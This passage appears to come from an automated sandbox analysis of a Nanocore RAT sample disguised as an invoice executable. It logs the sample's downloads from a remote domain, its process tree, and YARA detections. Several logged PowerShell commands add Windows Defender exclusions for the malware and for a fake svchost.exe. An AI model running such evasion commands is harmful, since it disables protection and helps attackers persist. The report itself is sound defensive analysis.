52 68 46 68 4d 47 68 46 68 74 6a 68 46 68 75 46 46 68 46 68 75 46 52 68 46 68 75 46 52 68 46 68 46 68 46 68 46 68 46 68 47 4b 68 46 68 75 52 68 46 68 75 68 46 68 47 6a 68 46 68 75 46 75 68 46 68 75 46 4c 68 46 68 4d 47 68 46 68 75 46 52 68 46 68 6a 47 68 46 68 75 75 75 68 46 68 75 75 4b 68 46 68 75 4b 75 68 46 68 75 75 74 68 46 68 75 46 54 68 46 68 75 46 4c 68 46
                                                                                                                                                                Data Ascii: a68<p>huFRhFhuFuhFhjRhFhuFuhFhuuThFhMMhFhuuthFhuFThFhuuKhFhuujhFhuFThFhuuuhFhuuFhFhFhFhFhFhRKhFhuuGhFhuuFhFhRFhFhuFuhFhjjhFhuuthFhMGhFhMRhFhMGhFhFhFhFhFhtRhFhRhFhuhFhGFhFhuFThFhuFRhFhuFuhFhRjhFhuFuhFhuuthFhuuThFhuFThFhuuuhFhuuFhFhFhFhFhFhtMhFhtjhFhtRhFhtjhFhtRhFhtjhFhtRhFhFhFhjKhFhuThFhuhFhGLhFhuuFhFhuujhFhuFuhFhuuthFhuuFhFhMGhFhuFRhFhGRhFhMGhFhuFMhFhuFuhFhFhFhRKhFhuuGhFhuuFhFhRFhFhuFuhFhjjhFhuuthFhMGhFhMRhFhMGhFhtjhFhuFFhFhuFRhFhuFRhFhFhFhFhFhGKhFhuRhFhuhFhGjhFhuFuhFhuFLhFhMGhFhuFRhFhjGhFhuuuhFhuuKhFhuKuhFhuuthFhuFThFhuFLhF


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                2192.168.2.549726104.21.71.23080C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Feb 22, 2021 07:45:59.300759077 CET4602OUTGET /base/751448401274A413C5FF91CCBC4EFF60.html HTTP/1.1
                                                                                                                                                                Host: coroloboxorozor.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Feb 22, 2021 07:45:59.399612904 CET4604INHTTP/1.1 200 OK
                                                                                                                                                                Date: Mon, 22 Feb 2021 06:45:59 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d20f155f33323495e33d6ddb2b7b8e8001613976359; expires=Wed, 24-Mar-21 06:45:59 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                                                                                Last-Modified: Mon, 22 Feb 2021 04:01:34 GMT
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                cf-request-id: 086a15e9aa00000b638f92d000000001
                                                                                                                                                                Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=VIly4ifI1CjuX1x7xMvuvZ4ufX4povTFDMLMZ3f38OLVTs8E%2F9TLnhlNudAQjutw%2Fry87GZyZyTnJS0oWfBBpIVNmdf4SH6OzvUUeYR%2Fb6xytam6"}],"group":"cf-nel"}
                                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 6256bf55def90b63-AMS
                                                                                                                                                                Data Raw: 32 62 62 63 0d 0a 3c 70 3e 47 47 68 4d 46 68 75 74 74 68 46 68 4c 68 46 68 46 68 46 68 74 68 46 68 46 68 46 68 4b 54 54 68 4b 54 54 68 46 68 46 68 75 52 74 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 6a 74 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 75 4b 52 68 46 68 46 68 46 68 75 74 68 4c 75 68 75 52 6a 68 75 74 68 46 68 75 52 46 68 4d 68 4b 46 54 68 4c 4c 68 75 52 74 68 75 68 47 6a 68 4b 46 54 68 4c 4c 68 52 74 68 75 46 74 68 75 46 54 68 75 75 54 68 4c 4b 68 75 75 4b 68 75 75 74 68 75 75 75 68 75 46 4c 68 75 75 74 68 4d 47 68 75 46 4d 68 4c 4b 68 4d 4d 68 4d 47 68 75 75 46 68 75 75 46 68 75 75 75 68 75 75 6a 68 4c 4b 68 4d 52 68 75 46 75 68 4c 4b 68 75 75 74 68 75 75 47 68 75 75 46 68 4c 4b 68 75 46 54 68 75 75 46 68 4c 4b 68 6a 52 68 47 4d 68 52 4c 68 4c 4b 68 75 46 4d 68 75 75 75 68 75 46 46 68 75 46 75 68 74 6a 68 75 4c 68 75 4c 68 75 46 68 4c 6a 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 52 46 68 6a 4d 68 46 68 46 68 47 6a 68 75 68 4c 68 46 68 47 6a 68 75 74 4b 68 74 75 68 75 52 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 4b 4b 74 68 46 68 4c 74 68 46 68 75 75 68 75 68 52 46 68 46 68 46 68 75 46 46 68 75 46 68 46 68 46 68 6a 68 46 68 46 68 46 68 46 68 46 68 46 68 75 4d 46 68 75 4c 75 68 75 46 68 46 68 46 68 4c 4b 68 46 68 46 68 46 68 75 6a 46 68 75 46 68 46 68 46 68 46 68 46 68 75 4b 52 68 46 68 4c 4b 68 46 68 46 68 46 68 4b 68 46 68 46 68 74 68 46 68 46 68 46 68 46 68 46 68 46 68 46 68 74 68 46 68 46 68 46
                                                                                                                                                                Data Ascii: 2bbc<p>GGhMFhutthFhLhFhFhFhthFhFhFhKTThKTThFhFhuRthFhFhFhFhFhFhFhjthFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhFhuKRhFhFhFhuthLuhuRjhuthFhuRFhMhKFThLLhuRthuhGjhKFThLLhRthuFthuFThuuThLKhuuKhuuthuuuhuFLhuuthMGhuFMhLKhMMhMGhuuFhuuFhuuuhuujhLKhMRhuFuhLKhuuthuuGhuuFhLKhuFThuuFhLKhjRhGMhRLhLKhuFMhuuuhuFFhuFuhtjhuLhuLhuFhLjhFhFhFhFhFhFhFhRFhjMhFhFhGjhuhLhFhGjhutKhtuhuRFhFhFhFhFhFhFhFhFhKKthFhLthFhuuhuhRFhFhFhuFFhuFhFhFhjhFhFhFhFhFhFhuMFhuLuhuFhFhFhLKhFhFhFhujFhuFhFhFhFhFhuKRhFhLKhFhFhFhKhFhFhthFhFhFhFhFhFhFhthFhFhF
                                                                                                                                                                Feb 22, 2021 07:46:07.745496035 CET6741OUTGET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1
                                                                                                                                                                Host: coroloboxorozor.com
                                                                                                                                                                Feb 22, 2021 07:46:08.022222042 CET6742OUTGET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1
                                                                                                                                                                Host: coroloboxorozor.com
                                                                                                                                                                Feb 22, 2021 07:46:08.334716082 CET6742OUTGET /base/95912DAC735F7FBEA8150232E35CAF73.html HTTP/1.1
                                                                                                                                                                Host: coroloboxorozor.com
                                                                                                                                                                Feb 22, 2021 07:46:11.912823915 CET6796INHTTP/1.1 200 OK
                                                                                                                                                                Date: Mon, 22 Feb 2021 06:46:11 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d8a4f89e5db9fd7094b57d272278adacd1613976368; expires=Wed, 24-Mar-21 06:46:08 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                                                                                Last-Modified: Mon, 22 Feb 2021 04:01:37 GMT
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                cf-request-id: 086a160ef500000b6356391000000001
                                                                                                                                                                Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ejzklZG6HnvVweS65LfVH3s82Eppf0x1bJhpn2oi820qxgiX7E1i7UCQocAriixXoOS21o0H9gVFzDkyQkD0Wo0070AkBQma%2BH71SAChAINnyN1X"}],"group":"cf-nel"}
                                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 6256bf918f140b63-AMS
                                                                                                                                                                Data Raw: 33 32 35 32 0d 0a 3c 70 3e 54 74 68 75 6a 75 68 4d 47 68 75 54 46 68 47 6a 68 75 47 4b 68 75 6a 74 68 75 75 75 68 75 6a 4c 68 75 47 47 68 4d 46 68 75 47 75 68 4b 4c 4d 68 75 4b 74 68 4d 6a 68 4b 74 74 68 4b 74 75 68 47 4c 68 75 4c 74 68 54 4b 68 75 4d 46 68 4b 4c 4c 68 4b 4b 74 68 6a 75 68 4d 47 68 75 4b 52 68 75 6a 4c 68 52 4d 68 4d 75 68 4b 4b 52 68 6a 75 68 47 46 68 6a 54 68 4b 46 4b 68 74 6a 68 6a 4c 68 75 4b 6a 68 75 52 4b 68 4d 54 68 4c 68 75 75 4d 68 75 52 52 68 4b 74 68 4b 4b 46 68 4b 4b 54 68 74 74 68 54 47 68 4b 75 54 68 47 75 68 75 4b 46 68 75 46 4d 68 75 74 75 68 4c 54 68 54 6a 68 6a 54 68 4b 46 6a 68 4d 4b 68 4b 4c 4b 68 75 4d 4c 68 54 74 68 54 52 68 75 4c 68 4c 47 68 6a 6a 68 4b 4c 75 68 4b 4c 74 68 75 74 54 68 4b 75 74 68 4b 46 4d 68 75 75 46 68 4b 4c 74 68 75 4c 47 68 6a 52 68 75 74 52 68 4b 4c 54 68 75 4d 74 68 4b 4b 46 68 4d 75 68 75 52 75 68 75 74 4d 68 4b 4b 4d 68 4b 74 4d 68 75 75 74 68 75 47 68 47 54 68 54 52 68 6a 47 68 75 4d 75 68 4c 4d 68 75 75 4d 68 4c 4b 68 75 52 4c 68 4d 6a 68 75 4c 4b 68 74 4b 68 75 6a 46 68 4b 47 68 75 75 74 68 75 4b 46 68 75 6a 52 68 75 4d 4c 68 47 54 68 4b 75 54 68 75 6a 75 68 4b 75 4c 68 75 47 54 68 75 47 46 68 75 47 4c 68 47 52 68 47 4c 68 75 52 75 68 75 54 74 68 4c 54 68 4d 46 68 4b 46 52 68 4b 46 68 4b 4d 68 47 4c 68 75 52 4d 68 4d 68 75 52 54 68 75 4c 68 6a 47 68 75 47 47 68 75 74 74 68 75 75 54 68 75 47 75 68 4c 47 68 75 47 54 68 75 4b 47 68 4b 75 52 68 4b 54 74 68 75 4c 4d 68 47 68 4b 4c 68 4b 46 74 68 4b 75 6a 68 54 46 68 52 4c 68 75 74 46 68 75 54 4c 68 47 4d 68 4b 4b 68 4b 4b 54 68 75 6a 4b 68 75 47 6a 68 54 75 68 75 6a 52 68 75 4d 47 68 75 4d 75
                                                                                                                                                                Data Ascii: 3252<p>TthujuhMGhuTFhGjhuGKhujthuuuhujLhuGGhMFhuGuhKLMhuKthMjhKtthKtuhGLhuLthTKhuMFhKLLhKKthjuhMGhuKRhujLhRMhMuhKKRhjuhGFhjThKFKhtjhjLhuKjhuRKhMThLhuuMhuRRhKthKKFhKKThtthTGhKuThGuhuKFhuFMhutuhLThTjhjThKFjhMKhKLKhuMLhTthTRhuLhLGhjjhKLuhKLthutThKuthKFMhuuFhKLthuLGhjRhutRhKLThuMthKKFhMuhuRuhutMhKKMhKtMhuuthuGhGThTRhjGhuMuhLMhuuMhLKhuRLhMjhuLKhtKhujFhKGhuuthuKFhujRhuMLhGThKuThujuhKuLhuGThuGFhuGLhGRhGLhuRuhuTthLThMFhKFRhKFhKMhGLhuRMhMhuRThuLhjGhuGGhutthuuThuGuhLGhuGThuKGhKuRhKTthuLMhGhKLhKFthKujhTFhRLhutFhuTLhGMhKKhKKThujKhuGjhTuhujRhuMGhuMu
                                                                                                                                                                Feb 22, 2021 07:46:22.073544025 CET7863OUTGET /base/84D1B49C9212CA5D522F0AF86A906727.html HTTP/1.1
                                                                                                                                                                Host: coroloboxorozor.com
                                                                                                                                                                Feb 22, 2021 07:46:22.150278091 CET7865INHTTP/1.1 200 OK
                                                                                                                                                                Date: Mon, 22 Feb 2021 06:46:22 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=da6c801eeade6f7b0def4839c9a77c4b81613976382; expires=Wed, 24-Mar-21 06:46:22 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                                                                                Last-Modified: Mon, 22 Feb 2021 04:01:39 GMT
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                cf-request-id: 086a16429f00000b6375246000000001
                                                                                                                                                                Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ryBWoADTjtuhHg5oD%2BjCDj1TR6kUqYe%2BZURubDEuTPm7HmmItoa%2FWiga8j%2BTEQvtFQJG4%2Bu0yrrA7rg9KKpXP3KoK3R7B3lp3GHAKzDGY9TshZwf"}],"group":"cf-nel"}
                                                                                                                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 6256bfe4384d0b63-AMS
                                                                                                                                                                Data Raw: 61 36 38 0d 0a 3c 70 3e 68 75 46 52 68 46 68 75 46 75 68 46 68 6a 52 68 46 68 75 46 75 68 46 68 75 75 54 68 46 68 4d 4d 68 46 68 75 75 74 68 46 68 75 46 54 68 46 68 75 75 4b 68 46 68 75 75 6a 68 46 68 75 46 54 68 46 68 75 75 75 68 46 68 75 75 46 68 46 68 46 68 46 68 46 68 46 68 52 4b 68 46 68 75 75 47 68 46 68 75 75 46 68 46 68 52 46 68 46 68 75 46 75 68 46 68 6a 6a 68 46 68 75 75 74 68 46 68 4d 47 68 46 68 4d 52 68 46 68 4d 47 68 46 68 46 68 46 68 46 68 46 68 74 52 68 46 68 52 68 46 68 75 68 46 68 47 46 68 46 68 75 46 54 68 46 68 75 46 52 68 46 68 75 46 75 68 46 68 52 6a 68 46 68 75 46 75 68 46 68 75 75 74 68 46 68 75 75 54 68 46 68 75 46 54 68 46 68 75 75 75 68 46 68 75 75 46 68 46 68 46 68 46 68 46 68 46 68 74 4d 68 46 68 74 6a 68 46 68 74 52 68 46 68 74 6a 68 46 68 74 52 68 46 68 74 6a 68 46 68 74 52 68 46 68 46 68 46 68 6a 4b 68 46 68 75 54 68 46 68 75 68 46 68 47 4c 68 46 68 75 75 46 68 46 68 75 75 6a 68 46 68 75 46 75 68 46 68 75 75 74 68 46 68 75 75 46 68 46 68 4d 47 68 46 68 75 46 52 68 46 68 47 52 68 46 68 4d 47 68 46 68 75 46 4d 68 46 68 75 46 75 68 46 68 46 68 46 68 52 4b 68 46 68 75 75 47 68 46 68 75 75 46 68 46 68 52 46 68 46 68 75 46 75 68 46 68 6a 6a 68 46 68 75 75 74 68 46 68 4d 47 68 46 68 4d 52 68 46 68 4d 47 68 46 68 74 6a 68 46 68 75 46 46 68 46 68 75 46 52 68 46 68 75 46 52 68 46 68 46 68 46 68 46 68 46 68 47 4b 68 46 68 75 52 68 46 68 75 68 46 68 47 6a 68 46 68 75 46 75 68 46 68 75 46 4c 68 46 68 4d 47 68 46 68 75 46 52 68 46 68 6a 47 68 46 68 75 75 75 68 46 68 75 75 4b 68 46 68 75 4b 75 68 46 68 75 75 74 68 46 68 75 46 54 68 46 68 75 46 4c 68 46 68 75 46 74
                                                                                                                                                                Data Ascii: a68<p>huFRhFhuFuhFhjRhFhuFuhFhuuThFhMMhFhuuthFhuFThFhuuKhFhuujhFhuFThFhuuuhFhuuFhFhFhFhFhFhRKhFhuuGhFhuuFhFhRFhFhuFuhFhjjhFhuuthFhMGhFhMRhFhMGhFhFhFhFhFhtRhFhRhFhuhFhGFhFhuFThFhuFRhFhuFuhFhRjhFhuFuhFhuuthFhuuThFhuFThFhuuuhFhuuFhFhFhFhFhFhtMhFhtjhFhtRhFhtjhFhtRhFhtjhFhtRhFhFhFhjKhFhuThFhuhFhGLhFhuuFhFhuujhFhuFuhFhuuthFhuuFhFhMGhFhuFRhFhGRhFhMGhFhuFMhFhuFuhFhFhFhRKhFhuuGhFhuuFhFhRFhFhuFuhFhjjhFhuuthFhMGhFhMRhFhMGhFhtjhFhuFFhFhuFRhFhuFRhFhFhFhFhFhGKhFhuRhFhuhFhGjhFhuFuhFhuFLhFhMGhFhuFRhFhjGhFhuuuhFhuuKhFhuKuhFhuuthFhuFThFhuFLhFhuFt


                                                                                                                                                                Code Manipulations

                                                                                                                                                                Statistics

                                                                                                                                                                Behavior

                                                                                                                                                                Click to jump to process

                                                                                                                                                                System Behavior

                                                                                                                                                                Analysis Process: CN-Invoice-XXXXX9808-19011143287990.exe PID: 5604 Parent PID: 5776

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:10
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe'
                                                                                                                                                                Imagebase:0x80000
                                                                                                                                                                File size:206848 bytes
                                                                                                                                                                MD5 hash:A656F522F604872E02DAEE9DBC458D9C
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.521351923.0000000003A25000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                                                Reputation:low

                                                                                                                                                                Analysis Process: powershell.exe PID: 1552 Parent PID: 5604

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:27
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe' -Force
                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                File size:430592 bytes
                                                                                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: svchost.exe PID: 2564 Parent PID: 556

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:27
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: conhost.exe PID: 5856 Parent PID: 1552

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:27
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: AdvancedRun.exe PID: 5380 Parent PID: 5604

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:28
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:91000 bytes
                                                                                                                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 3%, Metadefender, Browse
                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                Analysis Process: AdvancedRun.exe PID: 6268 Parent PID: 5380

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:32
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe' /SpecialRun 4101d8 5380
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:91000 bytes
                                                                                                                                                                MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                Analysis Process: svchost.exe PID: 6356 Parent PID: 556

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:37
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: svchost.exe PID: 6364 Parent PID: 556

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:37
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: svchost.exe PID: 6484 Parent PID: 556

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:38
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: powershell.exe PID: 6496 Parent PID: 5604

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:38
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287990.exe' -Force
                                                                                                                                                                Imagebase:0x300000
                                                                                                                                                                File size:430592 bytes
                                                                                                                                                                MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: explorer.exe PID: 6508 Parent PID: 3472

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:39
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Windows\explorer.exe' 'C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe'
                                                                                                                                                                Imagebase:0x7ff693d90000
                                                                                                                                                                File size:3933184 bytes
                                                                                                                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: conhost.exe PID: 6540 Parent PID: 6496

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:39
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: cmd.exe PID: 6552 Parent PID: 5604

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:39
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                                                                                                                Imagebase:0xaf0000
                                                                                                                                                                File size:232960 bytes
                                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: conhost.exe PID: 6560 Parent PID: 6552

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:39
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Analysis Process: svchost.exe PID: 6700 Parent PID: 556

                                                                                                                                                                General

                                                                                                                                                                Start time:07:45:40
                                                                                                                                                                Start date:22/02/2021
                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                                                Imagebase:0x7ff797770000
                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language

